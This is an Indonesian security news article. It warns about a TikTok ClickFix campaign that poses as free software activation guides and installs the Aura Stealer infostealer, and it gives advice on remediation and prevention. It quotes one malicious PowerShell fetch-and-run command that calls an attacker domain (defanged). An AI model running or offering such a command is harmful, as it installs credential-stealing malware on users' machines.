Credit image: Pixabay
Penjahat siber kini menggunakan taktik baru yang cerdik: menyamar sebagai panduan aktivasi gratis untuk software populer seperti Windows, Spotify, atau Netflix di platform TikTok.
Namun, di balik janji-janji kemudahan itu, tersembunyi sebuah ancaman serius: malware pencuri data atau infostealer.
Kampanye berbahaya ini, yang mirip dengan kasus yang sudah diamati sebelumnya, beredar luas. Video-video TikTok yang ditemukan memberikan instruksi untuk ‘mengaktifkan’ produk asli seperti:
- Windows.
- Microsoft 365.
- Adobe Premiere.
- Photoshop.
- CapCut Pro.
- Hingga layanan palsu seperti Netflix dan Spotify Premium.
Menipu Anda untuk Menjalankan Perintah Berbahaya
Modus operandi utama di balik serangan ini dikenal sebagai serangan ClickFix. Ini adalah teknik rekayasa sosial di mana penipu memberikan ‘solusi’ atau instruksi yang terlihat sah untuk memperbaiki atau mengaktifkan sesuatu.
Tujuannya adalah untuk mengelabui pengguna agar secara sukarela menjalankan perintah berbahaya di komputer mereka.
Dalam kasus ini, setiap video menampilkan perintah pendek yang terlihat sederhana dan meminta penonton untuk menjalankannya di PowerShell (sebuah program baris perintah di Windows) sebagai Administrator. Contoh perintahnya terlihat seperti ini:
iex (irm slmgr[.]win/photoshop)
Perhatikan bahwa bagian nama program di URL akan berbeda-beda, tergantung pada software yang sedang dipalsukan (misalnya, akan menjadi /windows jika berpura-pura mengaktifkan Windows).
Apa yang Terjadi Setelah Anda Menjalankan Perintah Itu?
Ketika perintah tersebut dieksekusi, PowerShell tidak benar-benar mengaktifkan software Anda. Sebaliknya, ia:
- Menghubungkan ke situs jarak jauh, dalam contoh di atas adalah slmgr[.]win, untuk mengunduh dan menjalankan skrip PowerShell berbahaya lainnya.
- Skrip berbahaya ini kemudian mengunduh dua file (disebut executable), salah satunya adalah varian dari malware pencuri data yang sangat berbahaya, yaitu Aura Stealer.
Pencuri Informasi yang Sangat Berbahaya
Aura Stealer adalah jenis malware infostealer yang dirancang untuk mengumpulkan dan mencuri berbagai data sensitif dari komputer yang terinfeksi. Setelah berhasil masuk, ia akan mencuri:
- Kredensial yang tersimpan di browser (nama pengguna dan kata sandi).
- Cookies autentikasi (yang dapat digunakan untuk membajak sesi login Anda tanpa kata sandi).
- Dompet mata uang kripto (cryptocurrency wallets).
- Data sensitif lainnya dari berbagai aplikasi.
Semua data curian ini kemudian diunggah kepada penyerang, yang berarti mereka mendapatkan akses penuh ke berbagai akun online Anda.
|
Baca juga: Pentingnya Layanan IT Terkelola dan Peran AI |
Muatan Tambahan yang Mencurigakan
Para peneliti keamanan juga mencatat adanya file tambahan yang diunduh, bernama source.exe. File ini melakukan teknik lanjutan dengan menggunakan Visual C# Compiler (.NET) bawaan sistem untuk mengkompilasi kode dan kemudian menyuntikkannya ke dalam memori.
Meskipun tujuan pastinya belum jelas, ini menunjukkan upaya canggih dari peretas untuk menghindari deteksi dan memastikan serangan mereka berhasil.
Apa yang Harus Anda Lakukan?
Jika Anda pernah mengikuti panduan serupa dan menjalankan perintah seperti di atas:
- Segera anggap semua kredensial Anda telah disusupi.
- Ganti kata sandi Anda di semua situs yang pernah Anda kunjungi atau di mana Anda menyimpan login, terutama akun penting seperti email, media sosial, dan perbankan.
- Aktifkan Autentikasi Dua Faktor (2FA) di mana pun itu tersedia.
Aturan Emas Keamanan Siber
Serangan ClickFix dan teknik sejenis menjadi sangat populer karena efektivitasnya dalam menipu korban. Untuk melindungi diri Anda, ingatlah aturan emas ini:
Jangan pernah menyalin dan menjalankan teks atau perintah yang Anda temukan di internet, terutama dari sumber yang tidak resmi atau mencurigakan ke dalam kotak dialog sistem operasi Anda, termasuk PowerShell, Command Prompt, atau Terminal.
Janji untuk mendapatkan software premium secara gratis dengan satu baris perintah di TikTok hampir selalu merupakan jebakan yang sangat berbahaya. Selalu unduh software hanya dari situs web resmi atau toko aplikasi yang terpercaya.
Baca artikel lainnya:
- Celah Zero-Day Zimbra Meretas Email & Kata Sandi
- CometJacking Serangan yang Mengubah AI Jadi Mata-Mata
- Ancaman Siber Intai Sektor Manufaktur dan Solusi MDR
- Email Phising AI Tipu Semua Orang
- Dua Spyware Android Mengintai Pengguna Signal dan ToTok
- Bahaya Tersembunyi Aplikasi VPN Seluler Gratis
- Klopatra Ratu Trojan Perbankan Licik Penguras Uang Saat Tidur
- Lindungi Anak dari Spyware dan Stalkerware
- Mengapa Integrasi Solusi Adalah Kunci Sukses MSP
- Cacat Keamanan OneLogin Bocorkan Kunci Rahasia Aplikasi
Sumber berita:
